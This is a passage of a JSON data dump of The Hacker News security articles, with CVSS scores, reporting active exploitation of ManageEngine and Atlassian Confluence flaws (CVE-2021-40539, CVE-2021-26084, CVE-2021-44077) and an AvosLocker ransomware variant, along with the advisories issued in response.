\"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. 
Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T06:36:28", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.\n\nThe flaw, tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.\n\nManageEngine ADSelfService Plus is an integrated self-service password management and a single sign-on solution for Active Directory and cloud apps, enabling admins to enforce two-factor authentication for application logins and users to reset their passwords.\n\n\"CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>), urging companies to apply the latest security update to their ManageEngine servers and \"ensure ADSelfService Plus is not directly accessible from the internet.\"\n\n\"The exploitation of ManageEngine ADSelfService Plus poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>). 
\"Successful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\"\n\nIn an independent advisory, Zoho [cautioned](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) that it's a \"critical issue\" and that it's \"noticing indications of this vulnerability being exploited.\"\n\n\"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\" the company said. \"This would allow the attacker to carry out subsequent attacks resulting in RCE.\"\n\nCVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which \u2014 [CVE-2021-37421](<https://nvd.nist.gov/vuln/detail/CVE-2021-37421>) (CVSS score: 9.8), [CVE-2021-37417](<https://nvd.nist.gov/vuln/detail/CVE-2021-37417>) (CVSS score: 9.8), and [CVE-2021-33055](<https://nvd.nist.gov/vuln/detail/CVE-2021-33055>) (CVSS score: 9.8) \u2014 were addressed in recent updates. A fourth vulnerability, [CVE-2021-28958](<https://nvd.nist.gov/vuln/detail/CVE-2021-28958>) (CVSS score: 9.8), was rectified in March 2021.\n\nThis development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. 
In March 2020, APT41 actors were [found](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) leveraging an RCE flaw in ManageEngine Desktop Central ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T05:45:00", "type": "thn", "title": "CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-28958", "CVE-2021-33055", "CVE-2021-37417", "CVE-2021-37421", "CVE-2021-40539"], "modified": "2021-09-17T04:49:55", "id": "THN:1678C3AE3BCB0278860461A943C3DF30", "href": 
"https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. 
It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. 
Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. 
Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. 
Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. 
\"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. 
Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. 
\"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq>)\n\nThe U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities.\n\nTracked as [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, \"allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>).\n\n\"A security misconfiguration in ServiceDesk Plus led to the vulnerability,\" Zoho [noted](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) in an independent advisory published on November 22. 
\"This vulnerability can allow an adversary to execute arbitrary code and carry out any subsequent attacks.\" Zoho [addressed](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) the same flaw in versions 11306 and above on September 16, 2021.\n\nCVE-2021-44077 is also the second flaw to be exploited by the same threat actor that was formerly found [exploiting](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) a security shortcoming in Zoho's self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus ([CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>)) to compromise at least 11 organizations, according to a new report published by Palo Alto Networks' Unit 42 threat intelligence team.\n\n[](<https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s0/timeline.jpg>)\n\n\"The threat actor expand[ed] its focus beyond ADSelfService Plus to other vulnerable software,\" Unit 42 researchers Robert Falcone and Peter Renals [said](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>). \"Most notably, between October 25 and November 8, the actor shifted attention to several organizations running a different Zoho product known as ManageEngine ServiceDesk Plus.\"\n\nThe attacks are believed to be orchestrated by a \"persistent and determined APT actor\" tracked by Microsoft under the moniker \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>),\" an emerging threat cluster that the tech giant says is operating out of China and has been previously observed exploiting a then zero-day flaw in SolarWinds Serv-U managed file transfer service earlier this year. 
Unit 42 is monitoring the combined activity as the \"**TiltedTemple**\" campaign.\n\nPost-exploitation activities following a successful compromise involve the actor uploading a new dropper (\"msiexec.exe\") to victim systems, which then deploys the Chinese-language JSP web shell named \"Godzilla\" for establishing persistence in those machines, echoing similar tactics used against the ADSelfService software.\n\nUnit 42 identified that there are currently over 4,700 internet-facing instances of ServiceDesk Plus globally, of which 2,900 (or 62%) spanning across the U.S., India, Russia, Great Britain, and Turkey are assessed to be vulnerable to exploitation.\n\nOver the past three months, at least two organizations have been compromised using the ManageEngine ServiceDesk Plus flaw, a number that's expected to climb further as the APT group ramps up its reconnaissance activities against technology, energy, transportation, healthcare, education, finance, and defense industries. \n\nZoho, for its part, has made available an [exploit detection tool](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) to help customers identify whether their on-premises installations have been compromised, in addition to recommending that users \"upgrade to the latest version of ServiceDesk Plus (12001) immediately\" to mitigate any potential risk arising out of exploitation.\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-03T05:24:00", "type": "thn", "title": "CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077"], "modified": "2021-12-03T13:34:13", "id": "THN:60B42277F576BB78A640A9D3B976D8D8", "href": "https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgX0lKnx5WdFoF_k4rJiFXzL8S6T7QacBw6YLYV-c3wmeack_LrSDflJj-tCiHWWDyuhvCRxff3JxsdWuCd7lCtomS2C0Mirl6h9_PazDFxXRjF9KAahOXfOCaW__Mzb9ltwXwFD0R-03BqrPy0D9gDWD-BXQOCmQdlraj-A-gPB1bJVOdRop98x2to/s728-e100/antimalware.jpg>)\n\nCybersecurity researchers have disclosed a new variant of 
the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. \n\n\"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),\" Trend Micro researchers, Christoper Ordonez and Alvin Nieto, [said](<https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html>) in a Monday analysis.\n\n\"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap [NSE script](<https://nmap.org/book/man-nse.html>).\"\n\n[AvosLocker](<https://thehackernews.com/2021/08/researchers-warn-of-4-new-ransomware.html>), one of the newer ransomware families to fill the vacuum left by [REvil](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>), has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.\n\nA ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.\n\nOther targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an [advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>) released by the U.S. 
